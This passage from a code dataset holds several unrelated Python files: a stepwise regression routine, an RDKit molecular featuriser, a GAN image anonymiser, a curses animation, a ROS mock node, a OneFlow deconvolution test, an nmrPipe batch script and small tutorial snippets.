logging.info('Add {:3} with p-value {:.6}'.format(best_feature, best_pval))\n\n        # backward step\n        model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included]))).fit()\n        # use all coefs except intercept\n        pvalues = model.pvalues.iloc[1:]\n        worst_pval = pvalues.max() # null if pvalues is empty\n        if worst_pval > threshold_out:\n            changed=True\n            worst_feature = pvalues.idxmax()\n            included.remove(worst_feature)\n            if verbose:\n                logging.info('Drop {:3} with p-value {:.6}'.format(worst_feature, worst_pval))\n        if not changed:\n            break\n    return included\n    \n\nif __name__ == '__main__':\n    \n    # load the data\n    from dataset import load_MedExp\n    \n\n    testdata = load_MedExp()\n    dfx = testdata[['educdec', 'med','age','fmde']]\n    dfy = testdata[['ndisease']]\n    \n    \n    # initialise the class\n    O = StepwiseReg()\n\n    # print this class's description\n    print(O.get_info().get('description'))\n    \n    # run the computation with the dfx and dfy arguments\n    dict_res = O.run(dfx,dfy)\n    \n    # get the returned dict\n    dict_res.get('result')\n    ","sub_path":"MedLearn/advance/advance_e_StepwiseReg.py","file_name":"advance_e_StepwiseReg.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"514389724","text":"#chapter 12 variables\n\ndef example3():\n    global x # this lets us read and write x variable. it makes the variable global.\n    x+=1\n    print(x)\n\nx = 6 # this variable is global to the entire script.\n\ndef example():\n    z = 5\n    print(z)\n\n#print(z) #this will cause an error because z is local to example()\n\ndef example2():\n    z = 7\n    print(z)\n    print(x)\n\n    #x+=1 # this won't work. 
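A tiny run of the stepwise_selection routine above on synthetic data where only two columns matter. The call itself is left commented since it depends on this module being importable; with these inputs the forward-backward loop would be expected to settle on ['x0', 'x2']:

import numpy as np
import pandas as pd

rng = np.random.default_rng(1)
X_demo = pd.DataFrame(rng.normal(size=(200, 4)), columns=['x0', 'x1', 'x2', 'x3'])
y_demo = 2.0 * X_demo['x0'] - 3.0 * X_demo['x2'] + rng.normal(scale=0.1, size=200)
# print(stepwise_selection(X_demo, y_demo))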
Python can't modify the x variable this way.\n #print(x)\n\n y = x + 1 # we can read the x variable.\n print(y)\n\n return y\n\nx = example2() # we can modify x in it's scope.\nprint(x)\n\n\n \n","sub_path":"localglobalvariables.py","file_name":"localglobalvariables.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306631259","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: featurizing\n Description :\n Author : erikxiong\n date: 2019-06-18\n-------------------------------------------------\n Change Activity:\n 2019-06-18:\n-------------------------------------------------\n\"\"\"\n__author__ = 'erikxiong'\n\nimport os\nfrom rdkit import Chem\nfrom rdkit.Chem import MolFromSmiles\nfrom rdkit import RDConfig\nfrom rdkit.Chem import ChemicalFeatures\nimport pickle\nimport numpy as np\n\nclass Graph:\n def __init__(self, smiles, atom, bond, bond_index, label):\n self.smiles = smiles\n self.atom = atom\n self.bond = bond\n self.bond_index = bond_index\n self.label = label\n \n def __str__(self):\n return f'graph of {self.smiles}'\n \n \ndef one_of_k_encoding(x, allowable_set):\n if x not in allowable_set:\n raise Exception(\"input {0} not in allowable set{1}:\".format(\n x, allowable_set))\n return [x == s for s in allowable_set]\n\n\ndef one_of_k_encoding_unk(x, allowable_set):\n \"\"\"Maps inputs not in the allowable set to the last element.\"\"\"\n if x not in allowable_set:\n x = allowable_set[-1]\n return [x == s for s in allowable_set]\n\ndef generate_graph(smiles, label=None):\n mol = MolFromSmiles(smiles)\n if not mol:\n raise ValueError(\"Could not parse SMILES string:\", smiles)\n \n SYMBOL = ['B','C','N','O','F','Si','P','S','Cl','As','Se','Br','Te','I','At','other']\n HYBRIDIZATION = [\n Chem.rdchem.HybridizationType.SP,\n Chem.rdchem.HybridizationType.SP2,\n Chem.rdchem.HybridizationType.SP3,\n Chem.rdchem.HybridizationType.SP3D,\n Chem.rdchem.HybridizationType.SP3D2,\n 'other',\n ]\n\n\n num_atom = Chem.RemoveHs(mol).GetNumAtoms()\n\n symbol = np.zeros((num_atom, 16), np.uint8)\n hybridization = np.zeros((num_atom, 6), np.uint8)\n degree = np.zeros((num_atom, 6), np.uint8)\n num_h = np.zeros((num_atom, 5), np.uint8) \n chirality = np.zeros((num_atom, 3), np.uint8)\n aromatic = np.zeros((num_atom, 1), np.uint8)\n formal_charge = np.zeros((num_atom, 1), np.float32)\n radical_electrons = np.zeros((num_atom, 1), np.float32)\n\n for i in range(num_atom):\n atom = mol.GetAtomWithIdx(i)\n symbol[i] = one_of_k_encoding_unk(atom.GetSymbol(), SYMBOL)\n hybridization[i] = one_of_k_encoding_unk(atom.GetHybridization(), HYBRIDIZATION)\n degree[i] = one_of_k_encoding_unk(atom.GetDegree(), [0, 1, 2, 3, 4, 5])\n num_h[i] = one_of_k_encoding_unk(atom.GetTotalNumHs(includeNeighbors=True), [0, 1, 2, 3, 4])\n try:\n chirality[i] = one_of_k_encoding_unk(atom.GetProp('_CIPCode'), ['R', 'S', 'unknown'])\n except:\n chirality[i] = [0, 0, 0]\n aromatic[i] = atom.GetIsAromatic()\n formal_charge[i] = atom.GetFormalCharge()\n radical_electrons[i] = atom.GetNumRadicalElectrons()\n \n \n \n# abundant features\n# won't bring substantial change to predictive performance, sometimes even worse \n \n AtomicWeight = np.zeros((num_atom, 1), np.float32)\n AtomicNumber = np.zeros((num_atom, 1), np.float32)\n Rvdw = np.zeros((num_atom, 1), np.float32)\n RCovalent = np.zeros((num_atom, 1), np.float32)\n DefaultValence = np.zeros((num_atom, 1), np.float32)\n valence = 
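The one-of-k helpers defined above drive the whole atom featurisation. A concrete call shows the encoding; the symbol list is shortened for the demo (the real one in the file has 16 entries):

SYMBOL_DEMO = ['B', 'C', 'N', 'O', 'F', 'other']

def one_of_k_encoding_unk_demo(x, allowable_set):
    # Anything outside the allowed set is folded into the last slot ('other').
    if x not in allowable_set:
        x = allowable_set[-1]
    return [x == s for s in allowable_set]

print(one_of_k_encoding_unk_demo('N', SYMBOL_DEMO))   # [False, False, True, False, False, False]
print(one_of_k_encoding_unk_demo('Zn', SYMBOL_DEMO))  # only the final 'other' slot is True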
np.zeros((num_atom, 1), np.float32)\n NOuterElecs = np.zeros((num_atom, 1), np.float32)\n ring = np.zeros((num_atom, 7), np.uint8)\n acceptor = np.zeros((num_atom, 1), np.uint8)\n donor = np.zeros((num_atom, 1), np.uint8)\n\n for i in range(num_atom):\n atom = mol.GetAtomWithIdx(i)\n AtomicNum = atom.GetAtomicNum()\n AtomicNumber[i] = AtomicNum\n AtomicWeight[i] = Chem.GetPeriodicTable().GetAtomicWeight(AtomicNum)\n Rvdw[i] = Chem.GetPeriodicTable().GetRvdw(AtomicNum) # (van der Waals radius)\n RCovalent[i] = Chem.GetPeriodicTable().GetRcovalent(AtomicNum) #(covalent radius)\n DefaultValence[i] = Chem.GetPeriodicTable().GetDefaultValence(AtomicNum) \n valence[i] = atom.GetExplicitValence()\n NOuterElecs[i] = Chem.GetPeriodicTable().GetNOuterElecs(AtomicNum)\n ring[i] = [int(atom.IsInRing()), int(atom.IsInRingSize(3)), \\\n int(atom.IsInRingSize(4)), int(atom.IsInRingSize(5)), \\\n int(atom.IsInRingSize(6)), int(atom.IsInRingSize(7)), int(atom.IsInRingSize(8))]\n \n\n factory = ChemicalFeatures.BuildFeatureFactory(os.path.join(RDConfig.RDDataDir, 'BaseFeatures.fdef'))\n feature = factory.GetFeaturesForMol(mol)\n for t in range(0, len(feature)):\n if feature[t].GetFamily() == 'Donor':\n for i in feature[t].GetAtomIds():\n donor[i] = 1\n elif feature[t].GetFamily() == 'Acceptor':\n for i in feature[t].GetAtomIds():\n acceptor[i] = 1\n \n\n num_bond = mol.GetNumBonds()\n if num_bond == 0:\n num_bond = 1 # except error caused by CH4, NH3\n bond_feat = np.zeros((num_bond*2, 10), np.int16)\n bond_index = np.zeros((num_bond*2, 2), np.int16)\n\n BOND_TYPE = [\n Chem.rdchem.BondType.SINGLE,\n Chem.rdchem.BondType.DOUBLE,\n Chem.rdchem.BondType.TRIPLE,\n Chem.rdchem.BondType.AROMATIC,\n ]\n\n BOND_STEREO = [\"STEREONONE\", \"STEREOANY\", \"STEREOZ\", \"STEREOE\"]\n ij = 0\n for i in range(num_atom):\n for j in range(num_atom):\n if i == j: continue\n bond = mol.GetBondBetweenAtoms(i, j)\n if bond is not None:\n atom1 = mol.GetAtomWithIdx(i)\n atom2 = mol.GetAtomWithIdx(j)\n bond_index[ij] = [i, j]\n bond_type = one_of_k_encoding(bond.GetBondType(), BOND_TYPE) \n bond_ring = [bond.GetIsConjugated(), bond.IsInRing()]\n bond_stereo = one_of_k_encoding(str(bond.GetStereo()), BOND_STEREO)\n bond_feat[ij] = bond_type + bond_ring + bond_stereo \n ij += 1\n\n graph = Graph(\n smiles,\n [symbol, hybridization, degree, num_h, chirality, aromatic, formal_charge, radical_electrons, \\\n AtomicWeight, AtomicNumber, Rvdw, RCovalent, DefaultValence, valence, NOuterElecs, ring, acceptor, donor],\n bond_feat,\n bond_index,\n np.array(label).reshape((1, 1)),\n )\n\n return graph\n \n \ndef graph_dict(smiles_list, label_list, filename):\n\n try:\n graph_dict = pickle.load(open(filename+'_abundant.pkl',\"rb\"))\n print('graph dicts loaded from '+ filename+'_abundant.pkl')\n \n except:\n graph_dict = {}\n for i, smiles in enumerate(smiles_list): \n graph_dict[smiles] = generate_graph(smiles, label_list[i])\n\n pickle.dump(graph_dict,open(filename+'_abundant.pkl',\"wb\"))\n print('graph dicts saved as '+ filename+'_abundant.pkl')\n\n return graph_dict\n\nif __name__ == '__main__':\n\n smiles_list = ['C1=CC=CC=C1', 'CNC', 'N', 'C', ]\n label_list = [2.,3.,4.,4.34]\n graph_dict = graph_dict(smiles_list, label_list, 'test')\n print(graph_dict['N'].atom)\n print(graph_dict['N'].bond)\n print(graph_dict['N'].bond_index)\n print(graph_dict['N'].label)\n print('load 
done.')\n","sub_path":"code/AttentiveFP/featurizing_abundant.py","file_name":"featurizing_abundant.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"565582740","text":"import cv2\nimport numpy as np\nimport os\nimport pickle\nimport PIL\nimport time\nimport torch\nimport torchvision\n\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom .semantic_segmenter import SemanticSegmenter\nfrom .mask_creater import MaskCreater\nfrom .inpainter import ImageInpainter\nfrom .utils import Debugger, label_img_to_color\n\n\nclass GANonymizer:\n def __init__(self, opt):\n for k, v in opt.__dict__.items():\n setattr(self, k, v)\n self.debugger = Debugger(\n opt.mode,\n save_dir = opt.inter_log if opt.mode == 'save' else None\n )\n\n print('[INFO] Loading modules')\n self.ss = SemanticSegmenter(opt)\n self.mc = MaskCreater(opt, self.debugger)\n self.ii = ImageInpainter(opt, self.debugger)\n\n self.to_tensor = transforms.ToTensor()\n self.to_pil = transforms.ToPILImage()\n\n def __call__(self, pil_img):\n \"\"\"\n Args:\n pil_img : input image (PIL.Image)\n\n Returns:\n output image (PIL.Image)\n \"\"\"\n start_time = time.time()\n # resize and convert to torch.Tensor\n img, base_size = self.preprocess(pil_img)\n\n # semantic segmentation for detecting dynamic objects and creating mask\n label_map = self.detect(img)\n\n # get object mask\n mask, max_obj_size = self.create_mask(img, label_map)\n\n # image and edge inpainting\n inpainted = self.inpaint(img, mask, max_obj_size)\n\n # resize and convert to PIL\n output = self.postprocess(inpainted, base_size)\n\n print('[INFO] whole elapsed time :', time.time() - start_time)\n return self.to_pil(img), output\n\n def preprocess(self, img):\n print('===== Preprocess =====')\n print('[INFO] original image size :', img.size)\n start = time.time()\n if self.resize_factor is None:\n print('[INFO] elapsed time :', time.time() - start)\n return self.to_tensor(img), img.size\n new_w = int(img.size[0] * self.resize_factor)\n new_h = int(img.size[1] * self.resize_factor)\n new_w -= new_w % 4\n new_h -= new_h % 4\n img = img.resize((new_w, new_h))\n print('[INFO] resized image size :', (new_w, new_h))\n print('[INFO] elapsed time :', time.time() - start)\n return self.to_tensor(img), (new_w, new_h)\n\n def detect(self, img):\n # semantic segmentation\n print('===== Semantic Segmentation =====')\n start = time.time()\n label_map = self.ss(img)\n vis, lc_img = label_img_to_color(label_map)\n self.debugger.imsave(vis, 'color_semseg_map.png')\n self.debugger.imsave(lc_img, 'label_color_map.png')\n print('[INFO] elapsed time :', time.time() - start)\n return label_map\n\n def create_mask(self, img, label_map):\n # create mask image and image with mask\n print('===== Creating Mask Image =====')\n start = time.time()\n mask, max_obj_size = self.mc(label_map) # shape=(h, w) # dtype=torch.float32\n print('[INFO] max_obj_size :', max_obj_size)\n # visualize the mask overlayed image\n mask3c = torch.stack([mask, torch.zeros_like(mask), torch.zeros_like(mask)], dim=0) \n self.debugger.matrix(mask3c, 'mask3c')\n self.debugger.matrix(img, 'img')\n overlay = img*0.8 + mask3c*0.2\n self.debugger.imsave(mask, 'final_mask.png')\n self.debugger.imsave(overlay, 'img_with_mask.png')\n print('[INFO] elapsed time :', time.time() - start)\n return mask, max_obj_size\n\n def inpaint(self, img: torch.Tensor, mask: torch.Tensor, max_obj_size: float):\n # inpainter\n print('===== Image 
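stars.py above staggers its coroutines by giving each a random first-phase delay. A compact standalone version of that pattern; the project's tick-based sleep helper from tools.sleep is replaced here by asyncio.sleep, which is an assumption made only so the sketch runs on its own:

import asyncio
import random

async def blink(name, offset):
    await asyncio.sleep(offset)          # random initial phase de-synchronises the stars
    for _ in range(3):
        print(name, 'dim'); await asyncio.sleep(0.3)
        print(name, 'bold'); await asyncio.sleep(0.5)

async def main():
    # Each star gets its own random offset, like offset_tics in the original.
    await asyncio.gather(*(blink(f'star{i}', random.random()) for i in range(3)))

asyncio.run(main())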
Inpainting =====')\n start = time.time()\n inpainted, inpainted_edge, edge = self.ii(img, mask, max_obj_size)\n self.debugger.imsave(edge, 'edge.png')\n self.debugger.imsave(inpainted_edge, 'inpainted_edge.png')\n print('[INFO] elapsed time :', time.time() - start)\n return inpainted\n\n def postprocess(self, img: torch.Tensor, size: tuple) -> torch.Tensor:\n print('===== Postprocess =====')\n start = time.time()\n out = self.to_pil(img)\n out = out.resize(size)\n print('[INFO] elapsed time :', time.time() - start)\n return out","sub_path":"app/api/gano/modules/ganonymizer.py","file_name":"ganonymizer.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92609737","text":"import asyncio\nimport curses\nimport random\n\nfrom tools.sleep import sleep\n\n\ndef get_stars(canvas, num):\n ''' Получить необходимое количество звезд-корутин.\n \n :param canvas: объект холста\n :type canvas: canvss\n :param num: количество звезд\n :type num: int\n '''\n stars = [get_random_star(canvas) for _ in range(num)]\n return stars\n\n\ndef get_random_star(canvas):\n ''' Создать корутину, рисующую звезду.\n\n :param canvas: объект холста\n :type canvas: canvas\n '''\n offset_tics = random.randint(1, 40)\n y_max, x_max = canvas.getmaxyx()\n column = random.randint(1, x_max - 2)\n row = random.randint(1, y_max - 2)\n star = blink(canvas, offset_tics, column, row)\n return star\n\n\nasync def blink(canvas, offset_tics, column, row):\n ''' Анимация звезды. \n \n У звезды 4 фазы. Для того, чтобы они мигали асинхронно, первая фаза случайна.\n \n :param canvas: объект холста\n :type canvas: canvas\n :param offset_tics: время действия первой фазы\n :type offset_tics: int\n :param column: координата на холсте\n :type column: int\n :param row: координата на холсте\n :type row: int\n '''\n symbols = ['*', ':', '=', '+', '-']\n symbol = random.choice(symbols)\n while True:\n canvas.addstr(row, column, symbol, curses.A_DIM)\n await sleep(offset_tics)\n\n canvas.addstr(row, column, symbol)\n await sleep(3)\n\n canvas.addstr(row, column, symbol, curses.A_BOLD)\n await sleep(5)\n\n canvas.addstr(row, column, symbol)\n await sleep(3)\n","sub_path":"space_cleaner/space_objects/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"244856146","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.githubusercontent.com/stonier/py_trees/devel/LICENSE\n#\n##############################################################################\n# Documentation\n##############################################################################\n\n\"\"\"\nMocks the move base action server of the ROS navigation stack.\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport dynamic_reconfigure.server\nimport rospy\n\nfrom py_trees_msgs.cfg import MockSafetySensorsConfig\n\n##############################################################################\n# Classes\n##############################################################################\n\n\nclass SafetySensors(object):\n \"\"\"\n Mocks the ability to enable/disable a safety sensor processing pipeline.\n This emulates a component which needs to be enabled contextually so that\n cpu resources can be efficiently optimised or to resolve 
contextual\n conflicts in the usage of the sensors.\n\n Dynamic Reconfigure:\n * **~enable** (:obj:`bool`)\n\n * enable/disable the safety sensor pipeline\n \"\"\"\n def __init__(self):\n # dynamic reconfigure\n self.parameters = None\n # note this instantiation will automatically trigger the callback, so\n # self.parameters *will* get initialised\n self.dynamic_reconfigure_server = dynamic_reconfigure.server.Server(\n MockSafetySensorsConfig,\n self.dynamic_reconfigure_callback\n )\n\n def dynamic_reconfigure_callback(self, config, unused_level):\n \"\"\"\n Args:\n config (:obj:`dynamic_reconfigure.encoding.Config`): incoming configuration\n level (:obj:`int`):\n \"\"\"\n self.parameters = config\n return config\n","sub_path":"py_trees_ros/mock/safety_sensors.py","file_name":"safety_sensors.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"26156774","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport os\nfrom collections import OrderedDict\n\nimport numpy as np\nimport oneflow as flow\nimport tensorflow as tf\nimport test_global_storage\nfrom test_util import GenArgList\n\n\ndef compare_with_tensorflow(device_type, params_case, dilations, data_format):\n input_shape, output_shape, padding, strides, kernel_size = params_case\n assert data_format in [\"NCHW\", \"NHWC\"]\n out_channels = output_shape[1] if data_format == \"NCHW\" else output_shape[3]\n in_channels = input_shape[1] if data_format == \"NCHW\" else input_shape[3]\n assert device_type in [\"gpu\"]\n\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float)\n\n @flow.global_function(type=\"train\", function_config=func_config)\n def DeconvJob():\n with flow.scope.placement(device_type, \"0:0\"):\n x = flow.get_variable(\n \"x\",\n shape=input_shape,\n dtype=flow.float,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n if data_format == \"NCHW\":\n weight = flow.get_variable(\n \"weight\",\n shape=(in_channels, out_channels, kernel_size, kernel_size),\n dtype=flow.float,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n else:\n weight = flow.get_variable(\n \"weight\",\n shape=(in_channels, kernel_size, kernel_size, out_channels),\n dtype=flow.float,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n loss = flow.nn.conv2d_transpose(\n x,\n weight,\n strides=strides,\n output_shape=output_shape,\n dilations=dilations,\n padding=padding,\n data_format=data_format,\n )\n flow.optimizer.SGD(\n flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0\n ).minimize(loss)\n\n flow.watch(x, test_global_storage.Setter(\"x\"))\n flow.watch_diff(x, test_global_storage.Setter(\"x_diff\"))\n flow.watch(weight, test_global_storage.Setter(\"weight\"))\n flow.watch_diff(weight, 
test_global_storage.Setter(\"weight_diff\"))\n flow.watch(loss, test_global_storage.Setter(\"loss\"))\n flow.watch_diff(loss, test_global_storage.Setter(\"loss_diff\"))\n\n return loss\n\n # OneFlow\n check_point = flow.train.CheckPoint()\n check_point.init()\n of_out = DeconvJob().get()\n # Tensorflow\n if data_format == \"NCHW\":\n with tf.GradientTape(persistent=True) as tape:\n x = tf.Variable(test_global_storage.Get(\"x\").transpose(0, 2, 3, 1))\n output_shape = (\n output_shape[0],\n output_shape[2],\n output_shape[3],\n output_shape[1],\n )\n w = tf.Variable(test_global_storage.Get(\"weight\").transpose(2, 3, 1, 0))\n tf_out = tf.nn.conv2d_transpose(\n x,\n w,\n output_shape=output_shape,\n strides=[1, strides, strides, 1],\n padding=padding,\n data_format=\"NHWC\",\n )\n\n loss_diff = test_global_storage.Get(\"loss_diff\").transpose(0, 2, 3, 1)\n tf_x_diff = tape.gradient(tf_out, x, loss_diff)\n tf_weight_diff = tape.gradient(tf_out, w, loss_diff)\n\n assert np.allclose(\n of_out.numpy().transpose(0, 2, 3, 1), tf_out.numpy(), rtol=1e-02, atol=1e-02\n )\n assert np.allclose(\n test_global_storage.Get(\"x_diff\").transpose(0, 2, 3, 1),\n tf_x_diff.numpy(),\n rtol=1e-4,\n atol=1e-4,\n )\n assert np.allclose(\n test_global_storage.Get(\"weight_diff\").transpose(2, 3, 1, 0),\n tf_weight_diff.numpy(),\n rtol=1e-4,\n atol=1e-4,\n )\n else:\n with tf.GradientTape(persistent=True) as tape:\n x = tf.Variable(test_global_storage.Get(\"x\"))\n w = tf.Variable(test_global_storage.Get(\"weight\").transpose(1, 2, 3, 0))\n tf_out = tf.nn.conv2d_transpose(\n x,\n w,\n output_shape=output_shape,\n strides=[1, strides, strides, 1],\n padding=padding,\n data_format=\"NHWC\",\n )\n loss_diff = test_global_storage.Get(\"loss_diff\")\n tf_x_diff = tape.gradient(tf_out, x, loss_diff)\n tf_weight_diff = tape.gradient(tf_out, w, loss_diff)\n\n assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-02, atol=1e-02), (\n of_out.numpy() - tf_out.numpy()\n )\n assert np.allclose(\n test_global_storage.Get(\"x_diff\"), tf_x_diff.numpy(), rtol=1e-02, atol=1e-02\n )\n assert np.allclose(\n test_global_storage.Get(\"weight_diff\").transpose(1, 2, 3, 0),\n tf_weight_diff.numpy(),\n rtol=1e-2,\n atol=1e-2,\n )\n\n\ndef test_deconv2d_NHWC_1n1c(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"device_type\"] = [\"gpu\"]\n # params_case: (input_shape, output_shape, padding, stirdes, kernel_size)\n arg_dict[\"params_case\"] = [\n ((32, 3, 3, 4), (32, 3, 3, 8), \"SAME\", 1, 3),\n ((32, 3, 3, 2), (32, 6, 6, 8), \"SAME\", 2, 4),\n ((32, 2, 2, 1), (32, 5, 5, 2), \"VALID\", 2, 2),\n ((32, 2, 2, 16), (32, 8, 8, 4), \"VALID\", 2, 5),\n ]\n arg_dict[\"dilations\"] = [1]\n arg_dict[\"data_format\"] = [\"NHWC\"]\n for arg in GenArgList(arg_dict):\n compare_with_tensorflow(*arg)\n\n\ndef test_deconv2d_NCHW_1n1c(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"device_type\"] = [\"gpu\"]\n # params_case: (input_shape, output_shape, padding, stirdes, kernel_size)\n arg_dict[\"params_case\"] = [\n ((32, 4, 3, 3), (32, 8, 3, 3), \"SAME\", 1, 3),\n ((32, 4, 3, 3), (32, 8, 6, 6), \"SAME\", 2, 5),\n ((32, 1, 2, 2), (32, 2, 5, 5), \"VALID\", 2, 2),\n ((32, 16, 2, 2), (32, 4, 8, 8), \"VALID\", 2, 5),\n ]\n arg_dict[\"dilations\"] = [1]\n arg_dict[\"data_format\"] = [\"NCHW\"]\n for arg in GenArgList(arg_dict):\n 
compare_with_tensorflow(*arg)\n","sub_path":"oneflow/python/test/ops/test_deconv2d.py","file_name":"test_deconv2d.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378474505","text":"# @Time : 2019-04-03 22:04:59\n# @Author : lemon_xiuyu\n# @Email : 5942527@qq.com\n# @File : contants.py\n# @function : 数据路径\n\n\n# from common.do_excel import DoExcel\n# do_excel = DoExcel(\"..//datas//cases.xlsx\")\n# 上面在字母好用,在python13-api-test下报错,\n# 这是相对路径,老师不建议,要用绝对路径\n\n# 定义一个常量封装: 常量:文件夹路径。变量:\n# 指定路径 封装常量路径\nimport os\n\"\"\"\n# 小简老师:课堂内容\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndata_dir = os.path.join(base_dir, \"datas\")\ncase_file = os.path.join(data_dir, \"cases.xlsx\")\n\n\"\"\"\n# 结合两位老师最简方式\n# 读取测试用例文件的路径\nbase_dir = os.path.dirname(os.getcwd()) # 根目录\ndata_dir = os.path.join(base_dir, \"datas\") # datas目录\ncase_file = os.path.join(data_dir, \"cases.xlsx\") # cases.xlsx表格路径\n\n# 获取配置文件-拼接uirl的路径\nconf_dir = os.path.join(base_dir, \"conf\") # conf路径\ntest_conf = os.path.join(conf_dir, \"test.conf\") # 第一套 配置文件 路径\ntest2_conf = os.path.join(conf_dir, \"test2.conf\") # 第二套 配置文件 路径\ntest3_conf = os.path.join(conf_dir, \"test3.conf\") # 第三套 配置文件 路径(自己本地环境)\nglobal_conf= os.path.join(conf_dir, \"global.conf\") # 总开关 配置文件 路径\n\nprint(case_file)\nprint(test_conf)\n# F:\\Wenjian\\Python_Pycharm\\python13-api-test\\conf\\test.conf","sub_path":"课堂笔记/class_0123_配置文件/common/contants.py","file_name":"contants.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"590406126","text":"#!/usr/bin/python\n\n# Requires an fid_*.com and ft_*.com template file in the folder \"template\"\n# AND\n# Requires a path_*.txt giving the path to the raw data\n# will run template/fid.com for each folder in the raw data directory\n\n\nimport os\nimport glob\nimport shutil\nimport re\n\n\n# Get directory listing, not including certain directories\nraw_path_filename = glob.glob('path_*.txt')[0]\nwith open(raw_path_filename, 'r') as raw_data_path:\n raw_data = raw_data_path.read()\npath_orig = os.getcwd()\nos.chdir(raw_data)\ndirList = os.listdir(os.getcwd())\ndirList = [f for f in dirList if os.path.isdir(f) and f not in ['fid','ft','proc_file','template']]\nos.chdir(path_orig)\n\n# Delete directories if they exist\nif os.path.exists('fid'):\n shutil.rmtree('fid')\nif os.path.exists('ft'):\n shutil.rmtree('ft')\nif os.path.exists('proc_file'):\n shutil.rmtree('proc_file')\nos.mkdir('ft')\nos.mkdir('fid')\nos.mkdir('proc_file')\n\n# excecute fid.com for all dirs\nos.chdir('template')\nfor f in dirList:\n exit_status = os.system(\"fid_*.com \" + f)\n if exit_status:\n quit()\nos.chdir('..')\nfidList=os.listdir('fid')\nfidList=[ os.path.splitext(f)[0] for f in fidList] #remove extension\n\n# excecute ft.com for all dirs\nos.chdir('template')\nfor f in fidList:\n exit_status = os.system(\"ft_*.com \" + f)\n if exit_status:\n quit()\nos.chdir('..')\n#read in the template ft script\n#replace in and out with each file's name\nft_name = glob.glob(\"template/ft_*.com\")[0]\nwith open(ft_name,'r') as fid:\n txt = fid.read()\n\nfor f in fidList:\n new_txt = re.sub('\\$1', f, txt)\n with open('./proc_file/' + 'ft_'+f+'.com','w') as fid:\n fid.writelines(new_txt)\n\nos.system('chmod +x ./proc_file/*')\n 
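The hard-coded output shapes in the test cases above follow conv2d_transpose's admissible-size rules: for a given input size there is a small range of output sizes the forward convolution would map back to it. This helper makes that arithmetic explicit (my reading of the TF/OneFlow shape semantics; treat the exact bounds as an assumption):

def deconv_out_range(in_size, stride, kernel, padding):
    # Output sizes O for which the forward conv maps O back to in_size.
    if padding == 'SAME':          # forward: ceil(O / stride) == in_size
        return (in_size - 1) * stride + 1, in_size * stride
    else:                          # 'VALID': ceil((O - kernel + 1) / stride) == in_size
        lo = (in_size - 1) * stride + kernel
        return lo, lo + stride - 1

print(deconv_out_range(2, 2, 2, 'VALID'))  # (4, 5): the (2,2)->(5,5) case is legal
print(deconv_out_range(2, 2, 5, 'VALID'))  # (7, 8): matches the (2,2)->(8,8) case
print(deconv_out_range(3, 2, 5, 'SAME'))   # (5, 6): matches the (3,3)->(6,6) case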
\n\n","sub_path":"nmrPipe_macros/batch_nmrPipe_v_2_python.py","file_name":"batch_nmrPipe_v_2_python.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61352358","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\na=np.arange(0,200,0.001)\nb=np.sin(a);\n# ax=plt.subplots(2,2)\nplt.figure()\nplt.plot(a,b,'g')\nplt.plot(a[a>np.pi],b[a>np.pi],'r')\nplt.xlim(0,2*np.pi)\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.show()\nx=np.array([[0,4],\n [2,3] ])\nprint(np.linalg.norm(x,axis=0))\nprint(math.sqrt(pow(3,2)+pow(4,2)+pow(4,2)+pow(6,2)+pow(1,2)))\nhelp(np.random)\n","sub_path":"py/plt_test.py","file_name":"plt_test.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"352939787","text":"\n\nfrom xai.brain.wordbase.verbs._sully import _SULLY\n\n#calss header\nclass _SULLIED(_SULLY, ):\n\tdef __init__(self,): \n\t\t_SULLY.__init__(self)\n\t\tself.name = \"SULLIED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"sully\"\n\t\tself.jsondata = 